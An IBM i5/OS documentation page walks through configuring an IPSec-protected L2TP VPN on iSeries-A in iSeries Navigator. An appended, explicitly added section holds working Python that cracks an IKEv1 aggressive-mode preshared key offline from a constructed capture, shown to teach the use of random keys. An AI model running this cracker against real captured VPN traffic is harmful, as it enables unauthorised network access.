ibm-information-center/dist/eclipse/plugins/i5OS.ic.rzaja_5.4.0.1/rzajaconfigurevpnoniseriesa3.htm

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xml:lang="en-us">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="security" content="public" />
<meta name="Robots" content="index,follow" />
<meta http-equiv="PICS-Label" content='(PICS-1.1 "http://www.icra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
<meta name="DC.Type" content="task" />
<meta name="DC.Title" content="Configure VPN on iSeries-A" />
<meta name="DC.Relation" scheme="URI" content="rzajaremoteuser.htm" />
<meta name="DC.Relation" scheme="URI" content="rzajaconfigureapppconnection.htm" />
<meta name="copyright" content="(C) Copyright IBM Corporation 2000, 2006" />
<meta name="DC.Rights.Owner" content="(C) Copyright IBM Corporation 2000, 2006" />
<meta name="DC.Format" content="XHTML" />
<meta name="DC.Identifier" content="rzajaconfigurevpnoniseriesa3" />
<meta name="DC.Language" content="en-us" />
<!-- All rights reserved. Licensed Materials Property of IBM -->
<!-- US Government Users Restricted Rights -->
<!-- Use, duplication or disclosure restricted by -->
<!-- GSA ADP Schedule Contract with IBM Corp. -->
<link rel="stylesheet" type="text/css" href="./ibmdita.css" />
<link rel="stylesheet" type="text/css" href="./ic.css" />
<title>Configure VPN on iSeries-A</title>
</head>
<body id="rzajaconfigurevpnoniseriesa3"><a name="rzajaconfigurevpnoniseriesa3"><!-- --></a>
<!-- Java sync-link --><script language="Javascript" src="../rzahg/synch.js" type="text/javascript"></script>
<h1 class="topictitle1">Configure VPN on iSeries-A</h1>
<div><div class="section"><p>Follow these steps to configure VPN on iSeries-A:</p>
</div>
<ol><li><span><span class="uicontrol">Configure the Internet Key Exchange policy</span></span><ol type="a"><li class="substepexpand"><span>In <span class="keyword">iSeries™ Navigator</span>,
expand <span class="menucascade"><span class="uicontrol">iSeries-A</span> &gt; <span class="uicontrol">Network</span> &gt; <span class="uicontrol">IP Policies</span> &gt; <span class="uicontrol">Virtual Private Networking</span> &gt; <span class="uicontrol">IP Security Policies</span></span>.</span> </li>
<li class="substepexpand"><span>Right-click <span class="uicontrol">Internet Key Exchange Policies</span> and
select <span class="uicontrol">New Internet Key Exchange Policy</span>.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">Remote Server</span> page, select <span class="uicontrol">Version
4 IP address</span> as the identifier type and then enter <samp class="codeph">205.13.237.6</samp> in
the <span class="uicontrol">IP address</span> field.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">Associations</span> page, select <span class="uicontrol">Preshared
key</span> to indicate that this connection uses a preshared key to authenticate
this policy.</span></li>
<li class="substepexpand"><span>Enter the preshared key in the <span class="uicontrol">Key</span> field.
Treat your preshared key like a password.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">Key Identifier</span> for the local key
server identifier type, and then enter the key identifier in the <span class="uicontrol">Identifier</span> field.
For example, <samp class="codeph">thisisthekeyid</samp>. The local key
server has a dynamically assigned IP address that cannot be known in
advance, so it cannot be identified by address; iSeries-B uses this key identifier
instead to identify iSeries-A when iSeries-A initiates a connection.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">Transforms</span> page, click <span class="uicontrol">Add</span> to
add the transforms that iSeries-A proposes to iSeries-B for key protection
and to specify whether the IKE policy uses identity protection when initiating
phase 1 negotiations.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">IKE Policy Transform</span> page, select <span class="uicontrol">Preshared
key</span> for your authentication method, <span class="uicontrol">SHA</span> for
your hash algorithm, and <span class="uicontrol">3DES-CBC</span> for your encryption
algorithm. Accept the default values for Diffie-Hellman group and Expire IKE
keys after. SHA (SHA-1) and 3DES are the algorithms this scenario uses; both are
now regarded as legacy, so if both key servers offer AES and a SHA-2 hash, prefer those.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to return to the <span class="uicontrol">Transforms</span> page.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">IKE aggressive mode negotiation (no identity
protection).</span></span> <div class="note"><span class="notetitle">Note:</span> Aggressive mode is used here because iSeries-A
has a dynamically assigned address and identifies itself by key identifier, but it sends
the identities and the authentication hash unencrypted. With a preshared key, anyone who
captures the exchange can test candidate keys offline against that hash, so a key taken
from a dictionary or a short password can be recovered. Choose a long, random preshared
key rather than a word or passphrase, and change it periodically.</div>
</li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to save your configurations.</span></li>
</ol>
</li>
<li><span><span class="uicontrol">Configure the data policy</span></span><ol type="a"><li class="substepexpand"><span>From the VPN interface, right-click <span class="uicontrol">Data policies</span> and
select <span class="uicontrol">New Data Policy</span>.</span> </li>
<li class="substepexpand"><span>On the <span class="uicontrol">General</span> page, specify the name
of the data policy. For example, <samp class="codeph">l2tpremoteuser</samp>.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Proposals</span> page. A proposal
is a collection of protocols that the initiating and responding key servers
use to establish a dynamic connection between two endpoints. You can use a
single data policy in several connection objects. However, not all remote
VPN key servers necessarily have the same data policy properties. Therefore,
you can add several proposals to one data policy. When establishing a VPN
connection to a remote key server, there must be at least one matching proposal
in the data policy of the initiator and the responder.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">Add</span> to add a data policy transform.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">Transport</span> for the encapsulation
mode. Transport mode is appropriate because the two L2TP endpoints are also the two
IPSec endpoints: IPSec protects the L2TP/UDP packets exchanged between the hosts themselves,
and no third network sits behind either key server at the IPSec layer.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to return to the <span class="uicontrol">Transforms</span> page.</span></li>
<li class="substepexpand"><span>Specify a key expiration value.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to save your new data policy.</span></li>
</ol>
</li>
<li><span><span class="uicontrol">Configure the dynamic-key group</span></span><ol type="a"><li class="substepexpand"><span>From the VPN interface, expand <span class="uicontrol">Secure Connections</span>.</span> </li>
<li class="substepexpand"><span>Right-click <span class="uicontrol">By Group</span> and select <span class="uicontrol">New
Dynamic-Key Group</span>.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">General</span> page, specify a name for
the group. For example, <samp class="codeph">l2tptocorp</samp>.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">Protects a locally initiated L2TP tunnel</span>.</span></li>
<li class="substepexpand"><span>For system role, select <span class="uicontrol">Both systems are hosts</span>.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Policy</span> page. Select the data
policy you created in the step <span class="uicontrol">Configure the data policy</span>, <samp class="codeph">l2tpremoteuser</samp>,
from the <span class="uicontrol">Data policy</span> drop-down list.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">Local system initiates connection</span> to
indicate that only iSeries-A can initiate connections with iSeries-B.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Connections</span> page. Select <span class="uicontrol">Generate
the following policy filter rule for this group</span>. Click <span class="uicontrol">Edit</span> to
define the parameters of the policy filter.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">Policy Filter - Local Addresses</span> page,
select <span class="uicontrol">Key Identifier</span> for the identifier type.</span></li>
<li class="substepexpand"><span>For the identifier, select the key identifier, <samp class="codeph">thisisthekeyid</samp>,
that you defined in the IKE policy.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Policy Filter - Remote Addresses</span> page.
Select <span class="uicontrol">IP version 4 address</span> from the <span class="uicontrol">Identifier
type</span> drop-down list.</span></li>
<li class="substepexpand"><span>Enter <samp class="codeph">205.13.237.6</samp> in the <span class="uicontrol">Identifier</span> field.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Policy Filter - Services</span> page.
Enter <samp class="codeph">1701</samp> in the <span class="uicontrol">Local Port</span> and <span class="uicontrol">Remote
Port</span> fields. Port 1701 is the well-known port for L2TP.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">UDP</span> from the <span class="uicontrol">Protocol</span> drop-down
list.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to return to the <span class="uicontrol">Connections</span> page.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Interfaces</span> page. Select any
line or PPP profile to which this group will apply. You have not created the
PPP profile for this group yet. After you do so, you will need to edit the
properties of this group so that the group applies to the PPP profile you
create in the next step.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to create the dynamic-key group,
l2tptocorp.</span></li>
</ol>
</li>
<li><span><span class="uicontrol">Configure the dynamic-key connection</span></span><ol type="a"><li class="substepexpand"><span>From the VPN interface, expand <span class="uicontrol">By Group</span>.
This displays a list of all dynamic-key groups you have configured on iSeries-A.</span> </li>
<li class="substepexpand"><span>Right-click <span class="uicontrol">l2tptocorp</span> and select <span class="uicontrol">New
Dynamic-Key Connection</span>.</span></li>
<li class="substepexpand"><span>On the <span class="uicontrol">General</span> page, specify an optional
description for the connection.</span></li>
<li class="substepexpand"><span>For the remote key server, select <span class="uicontrol">Version 4 IP address</span> for
the identifier type.</span></li>
<li class="substepexpand"><span>Select <samp class="codeph">205.13.237.6</samp> from the <span class="uicontrol">IP
address</span> drop-down list.</span></li>
<li class="substepexpand"><span>Deselect <span class="uicontrol">Start on-demand</span>.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Local Addresses</span> page. Select <span class="uicontrol">Key
identifier</span> for the identifier type and then select <samp class="codeph">thisisthekeyid</samp> from
the <span class="uicontrol">Identifier</span> drop-down list.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Remote Addresses</span> page. Select <span class="uicontrol">IP
version 4 address</span> for the identifier type.</span></li>
<li class="substepexpand"><span>Enter <samp class="codeph">205.13.237.6</samp> in the <span class="uicontrol">Identifier</span> field.</span></li>
<li class="substepexpand"><span>Go to the <span class="uicontrol">Services</span> page. Enter <samp class="codeph">1701</samp> in
the <span class="uicontrol">Local Port</span> and <span class="uicontrol">Remote Port</span> fields.
Port 1701 is the well-known port for L2TP.</span></li>
<li class="substepexpand"><span>Select <span class="uicontrol">UDP</span> from the <span class="uicontrol">Protocol</span> drop-down
list.</span></li>
<li class="substepexpand"><span>Click <span class="uicontrol">OK</span> to create the dynamic-key connection.</span></li>
</ol>
</li>
</ol>
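<div class="section"><p>The note in step 1 warns that preshared keys combined with aggressive mode can be recovered by a dictionary attack. The following added example, which is not part of this Information Center topic or of i5/OS, shows why: it reconstructs the IKEv1 aggressive-mode HASH_R computation from RFC 2409 (SHA selected as the hash, so the prf is HMAC-SHA1), builds a constructed capture of the two clear-text messages between iSeries-A and iSeries-B (205.13.237.6), and runs a small constructed wordlist against it. A dictionary key is recovered; a random 256-bit key is not. The Diffie-Hellman values, cookies, nonces and SA payload body are random stand-ins, not a real capture.</p>

```python
"""Added example: offline dictionary attack against an IKEv1 aggressive-mode
preshared key. Illustrative code, not part of i5/OS or iSeries Navigator.
Field layout follows RFC 2409; the capture below is constructed inline."""
import hashlib
import hmac
import secrets
import struct
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    # With SHA selected as the IKE hash algorithm, the RFC 2409 prf is HMAC-SHA1.
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    # RFC 2409 section 5.4: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
    return prf(psk, ni_b + nr_b)


def hash_r(skeyid: bytes, c: dict) -> bytes:
    # RFC 2409 section 5: HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    return prf(skeyid, c["gxr"] + c["gxi"] + c["cky_r"] + c["cky_i"] + c["sai_b"] + c["idir_b"])


def id_ipv4(addr: str) -> bytes:
    # Identification payload body: ID type 1 (ID_IPV4_ADDR), protocol UDP, port 500, address.
    return struct.pack("!BBH", 1, 17, 500) + bytes(int(o) for o in addr.split("."))


def aggressive_mode_capture(psk: bytes, responder_ip: str = "205.13.237.6") -> dict:
    """Constructed aggressive-mode exchange as a passive observer sees it.

    Message 1 (iSeries-A -> iSeries-B): SA, KE (g^xi), Ni, IDii (the key identifier).
    Message 2 (iSeries-B -> iSeries-A): SA, KE (g^xr), Nr, IDir, HASH_R.
    Every input to HASH_R except SKEYID travels in the clear, so HASH_R is an
    offline-checkable commitment to the preshared key.
    """
    c = {
        "cky_i": secrets.token_bytes(8),
        "cky_r": secrets.token_bytes(8),
        "gxi": secrets.token_bytes(128),   # stand-in for a DH group 2 public value
        "gxr": secrets.token_bytes(128),
        "ni": secrets.token_bytes(16),
        "nr": secrets.token_bytes(16),
        "sai_b": bytes.fromhex("0000000100000001"),  # stand-in for the SA payload body
        "idir_b": id_ipv4(responder_ip),
    }
    c["hash_r"] = hash_r(skeyid_psk(psk, c["ni"], c["nr"]), c)
    return c


def crack_psk(capture: dict, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Test each candidate key against the observed HASH_R; return the match, if any."""
    for cand in wordlist:
        guess = hash_r(skeyid_psk(cand, capture["ni"], capture["nr"]), capture)
        if hmac.compare_digest(guess, capture["hash_r"]):
            return cand
    return None


def generate_psk(nbytes: int = 32) -> str:
    """A preshared key no wordlist contains: nbytes from the OS CSPRNG, hex-encoded."""
    return secrets.token_hex(nbytes)


# Constructed wordlist; a real attack would use a multi-million-entry list.
WORDLIST = [b"password", b"iseries", b"corpvpn", b"l2tptocorp", b"summer2006"]

if __name__ == "__main__":
    weak = aggressive_mode_capture(b"corpvpn")
    print("weak key recovered:", crack_psk(weak, WORDLIST))
    strong = aggressive_mode_capture(generate_psk().encode())
    print("strong key recovered:", crack_psk(strong, WORDLIST))
```

<p>The attack needs only the two clear-text messages, not an active position on the path, so the defence is the key itself: enter the output of <samp class="codeph">generate_psk()</samp> (or an equivalent random value) in the <span class="uicontrol">Key</span> field on both key servers rather than a memorable word, and rotate it on a schedule.</p></div>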
</div>
<div>
<div class="familylinks">
<div class="parentlink"><strong>Parent topic:</strong> <a href="rzajaremoteuser.htm" title="In this scenario, you learn how to setup a connection between a branch office host and a corporate office that uses L2TP protected by IPSec. The branch office has a dynamically assigned IP address, while the corporate office has a static, globally routable IP address.">Scenario: Protect an L2TP voluntary tunnel with IPSec</a></div>
<div class="nextlink"><strong>Next topic:</strong> <a href="rzajaconfigureapppconnection.htm">Configure a PPP connection profile and virtual line on iSeries-A</a></div>
</div>
</div>
</body>
</html>